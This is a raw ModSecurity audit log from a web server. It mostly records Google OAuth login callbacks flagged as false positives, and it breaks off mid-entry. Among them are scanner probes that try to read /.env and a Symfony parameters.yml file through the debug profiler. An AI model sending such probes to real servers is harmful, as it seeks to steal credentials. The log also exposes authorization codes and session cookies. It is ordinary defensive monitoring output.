www.jinansystem.com X-Real-IP: 212.28.242.186 X-Accel-Internal: /internal-nginx-static-location Connection: close sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138", "Microsoft Edge";v="138" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" upgrade-insecure-requests: 1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0 accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 sec-fetch-site: cross-site sec-fetch-mode: navigate sec-fetch-user: ?1 sec-fetch-dest: document referer: https://accounts.google.com/ accept-encoding: gzip, deflate, br, zstd accept-language: en-US,en;q=0.9,ar;q=0.8 priority: u=0, i cookie: PHPSESSID=oa3ok1f92g3u312j96r10ptla2 --d09f581c-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3676 Content-Type: text/html; charset=UTF-8 --d09f581c-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIHq2looLYw4or2LgWJ6eAAAANc"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753344730470765 471716 (- - -) Stopwatch2: 1753344730470765 471716; combined=5834, p1=624, p2=4350, p3=679, p4=66, p5=115, sr=182, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d09f581c-Z-- --50cd5a6f-A-- [24/Jul/2025:11:14:42.701998 +0300] aIHrclooLYw4or2LgWJ_OAAAANM 195.112.198.68 50358 127.0.0.1 7081 --50cd5a6f-B-- GET /administration/index.php?code=4/0AVMBsJhRAkt6cryYpXl6rBdQ4wcT1jbwNgaObptA0RUJVRhsAcvVJlgHxj2QMFItN8JIZQ&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=0&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: jinansystem.com X-Real-IP: 195.112.198.68 X-Accel-Internal: /internal-nginx-static-location Connection: close user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0 accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 accept-language: en-US,en;q=0.5 accept-encoding: gzip, deflate, br, zstd referer: https://accounts.google.com/ upgrade-insecure-requests: 1 sec-fetch-dest: document sec-fetch-mode: navigate sec-fetch-site: cross-site sec-fetch-user: ?1 priority: u=0, i cookie: PHPSESSID=hvva38ip8a44f1aatti7dtm5l1 --50cd5a6f-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3671 Content-Type: text/html; charset=UTF-8 --50cd5a6f-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIHrclooLYw4or2LgWJ_OAAAANM"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753344882265419 436770 (- - -) Stopwatch2: 1753344882265419 436770; combined=4999, p1=1004, p2=3669, p3=83, p4=61, p5=182, sr=187, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --50cd5a6f-Z-- --91e8cd0d-A-- [24/Jul/2025:11:17:08.306052 +0300] aIHsBFooLYw4or2LgWKC7AAAAMI 85.203.15.238 36226 127.0.0.1 7081 --91e8cd0d-B-- GET /.env HTTP/1.0 Host: jinansystem.com X-Real-IP: 85.203.15.238 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept-Encoding: gzip, deflate Accept: */* --91e8cd0d-F-- HTTP/1.1 404 Not Found Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Wed, 23 Jul 2014 14:20:24 GMT ETag: "3bf-4fedd0a7c7a00" Accept-Ranges: bytes Content-Length: 959 Content-Type: text/html --91e8cd0d-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "jinansystem.com"] [uri "/.env"] [unique_id "aIHsBFooLYw4or2LgWKC7AAAAMI"] Stopwatch: 1753345028301868 4272 (- - -) Stopwatch2: 1753345028301868 4272; combined=2477, p1=626, p2=1782, p3=0, p4=0, p5=69, sr=134, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --91e8cd0d-Z-- --c670d34c-A-- [24/Jul/2025:11:24:52.235283 +0300] aIHt0xukk8cgt8UnU9pqXQAAAEA 141.105.87.197 52744 127.0.0.1 7081 --c670d34c-B-- GET /administration/index.php?code=4/0AVMBsJhqV7c7fDmUaLlRQRo4tDu-37YixwyM12HOIXgPXMbRmKoy-cqs9fYWh1tj3mOQWg&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=0&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: jinansystem.com X-Real-IP: 141.105.87.197 X-Accel-Internal: /internal-nginx-static-location Connection: close sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138", "Google Chrome";v="138" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" upgrade-insecure-requests: 1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 sec-fetch-site: cross-site sec-fetch-mode: navigate sec-fetch-user: ?1 sec-fetch-dest: document referer: https://accounts.google.com/ accept-encoding: gzip, deflate, br, zstd accept-language: en-US,en;q=0.9 priority: u=0, i cookie: PHPSESSID=fl51e5631vfrh1ktf7rf824hk3 --c670d34c-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3671 Content-Type: text/html; charset=UTF-8 --c670d34c-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIHt0xukk8cgt8UnU9pqXQAAAEA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753345491769750 465780 (- - -) Stopwatch2: 1753345491769750 465780; combined=5656, p1=586, p2=4623, p3=210, p4=58, p5=179, sr=156, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c670d34c-Z-- --0af74841-A-- [24/Jul/2025:11:27:25.413854 +0300] aIHubFooLYw4or2LgWKRmQAAANE 212.28.242.186 42462 127.0.0.1 7081 --0af74841-B-- GET /administration/index.php?code=4/0AVMBsJg1nlwoa_F2JRq9xqi1tVVPDgQB365itcH91xAPjhyinoNv53WcKRpFfknH08m46w&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=0&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: www.jinansystem.com X-Real-IP: 212.28.242.186 X-Accel-Internal: /internal-nginx-static-location Connection: close sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138", "Google Chrome";v="138" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" upgrade-insecure-requests: 1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 sec-fetch-site: cross-site sec-fetch-mode: navigate sec-fetch-user: ?1 sec-fetch-dest: document referer: https://accounts.google.com/ accept-encoding: gzip, deflate, br, zstd accept-language: ar-LB,ar;q=0.9,en-LB;q=0.8,en;q=0.7,en-US;q=0.6 priority: u=0, i cookie: PHPSESSID=tull8t6h7upgkrvn3f0a3fovd7 --0af74841-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3676 Content-Type: text/html; charset=UTF-8 --0af74841-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIHubFooLYw4or2LgWKRmQAAANE"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753345644981250 432907 (- - -) Stopwatch2: 1753345644981250 432907; combined=5511, p1=665, p2=4436, p3=149, p4=63, p5=197, sr=230, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --0af74841-Z-- --76d03d53-A-- [24/Jul/2025:11:29:22.448913 +0300] aIHu4looLYw4or2LgWKTygAAAMU 212.28.242.186 45346 127.0.0.1 7081 --76d03d53-B-- GET /administration/index.php?code=4/0AVMBsJgkws7UnwsUPO0_-Li_NC20wCRa6aLXILMUwI4L2ieDw1TYeM-dvP2C4b75uNFezQ&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=0&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: jinansystem.com X-Real-IP: 212.28.242.186 X-Accel-Internal: /internal-nginx-static-location Connection: close user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.0 accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 accept-language: en-US,en;q=0.5 accept-encoding: gzip, deflate, br, zstd referer: https://accounts.google.com/ upgrade-insecure-requests: 1 sec-fetch-dest: document sec-fetch-mode: navigate sec-fetch-site: cross-site sec-fetch-user: ?1 priority: u=0, i cookie: PHPSESSID=4dp1jn4vujk002pum2otk7klh6 --76d03d53-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3671 Content-Type: text/html; charset=UTF-8 --76d03d53-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIHu4looLYw4or2LgWKTygAAAMU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753345762036936 412175 (- - -) Stopwatch2: 1753345762036936 412175; combined=4285, p1=529, p2=3410, p3=122, p4=76, p5=148, sr=133, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --76d03d53-Z-- --bfe32a42-A-- [24/Jul/2025:11:31:55.022425 +0300] aIHvehukk8cgt8UnU9pt2wAAAEs 141.105.87.197 33602 127.0.0.1 7081 --bfe32a42-B-- GET /administration/index.php?code=4/0AVMBsJgWg2dBydfRhxPChPzJALxYhTVdUb5_GA39eaamlvPWwhbMV2qjwyeYgqVn01LcAg&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=0&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: www.jinansystem.com X-Real-IP: 141.105.87.197 X-Accel-Internal: /internal-nginx-static-location Connection: close user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0 accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 accept-language: en-US,en;q=0.5 accept-encoding: gzip, deflate, br, zstd referer: https://accounts.google.com/ upgrade-insecure-requests: 1 sec-fetch-dest: document sec-fetch-mode: navigate sec-fetch-site: cross-site sec-fetch-user: ?1 priority: u=0, i cookie: PHPSESSID=3r2jh4bn825hjn7g3q1dlr3r02 --bfe32a42-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3676 Content-Type: text/html; charset=UTF-8 --bfe32a42-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIHvehukk8cgt8UnU9pt2wAAAEs"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753345914602410 420258 (- - -) Stopwatch2: 1753345914602410 420258; combined=5289, p1=646, p2=4308, p3=182, p4=42, p5=110, sr=179, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --bfe32a42-Z-- --fe1cf10e-A-- [24/Jul/2025:11:32:37.757657 +0300] aIHvpRukk8cgt8UnU9puegAAAFI 45.82.255.188 52980 127.0.0.1 7081 --fe1cf10e-B-- GET /app_dev.php/_profiler/open?file=app/config/parameters.yml HTTP/1.0 Host: raqmix.cloud X-Real-IP: 45.82.255.188 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --fe1cf10e-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.23 Upgrade: h2,h2c Connection: Upgrade, close Content-Type: text/html; charset=UTF-8 --fe1cf10e-H-- Message: Warning. Matched phrase "/config/parameters.yml" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Matched phrase "parameters.yml" at ARGS:file. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||raqmix.cloud|F|2"] [data "Matched Data: parameters.yml found within ARGS:file: app/config/parameters.yml"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/config/parameters.yml" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "raqmix.cloud"] [uri "/app_dev.php/_profiler/open"] [unique_id "aIHvpRukk8cgt8UnU9puegAAAFI"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "parameters.yml" at ARGS:file. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||raqmix.cloud|F|2"] [data "Matched Data: parameters.yml found within ARGS:file: app/config/parameters.yml"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "raqmix.cloud"] [uri "/app_dev.php/_profiler/open"] [unique_id "aIHvpRukk8cgt8UnU9puegAAAFI"] Apache-Error: [file "mod_proxy_fcgi.c"] [line 896] [level 3] AH01071: Got error 'Primary script unknown' Apache-Handler: proxy:unix:/var/www/vhosts/system/raqmix.cloud/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753345957740258 17474 (- - -) Stopwatch2: 1753345957740258 17474; combined=4553, p1=551, p2=3772, p3=54, p4=44, p5=131, sr=183, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --fe1cf10e-Z-- --8c50aa2b-A-- [24/Jul/2025:11:33:11.099281 +0300] aIHvwVooLYw4or2LgWKZAAAAANc 212.28.242.186 50250 127.0.0.1 7081 --8c50aa2b-B-- GET /faculty/onlineClasses.php?code=4/0AVMBsJhLgUupcw5m_-sS_q8I5Eb4XH02Hg-xnTWgtVLFwQrcinbKlUm0Qyc9W63bMN0n0A&scope=email%20profile%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/gmail.readonly%20https://www.googleapis.com/auth/calendar.readonly%20https://www.googleapis.com/auth/classroom.courses.readonly%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=0&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: jinansystem.com X-Real-IP: 212.28.242.186 X-Accel-Internal: /internal-nginx-static-location Connection: close sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138", "Google Chrome";v="138" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" upgrade-insecure-requests: 1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 sec-fetch-site: cross-site sec-fetch-mode: navigate sec-fetch-user: ?1 sec-fetch-dest: document referer: https://accounts.google.com/ accept-encoding: gzip, deflate, br, zstd accept-language: en-US,en;q=0.9 priority: u=0, i cookie: PHPSESSID=0ual2s6ela2k6qjm5m0hfctp16 --8c50aa2b-F-- HTTP/1.1 200 OK Expires: Mon, 16 Jul 1981 05:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 7894 Content-Type: text/html; charset=UTF-8 --8c50aa2b-E-- --8c50aa2b-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/gmail.readonly https:/www.googleapis.com/auth/calendar.readonly https:/www.googleapis.com/auth/classroom.courses.readonly https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/gmail.readonly https:/www.googleapis.com/auth/calendar.readonly https:/www.googleapis.com/auth/classroom.courses.readonly https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname 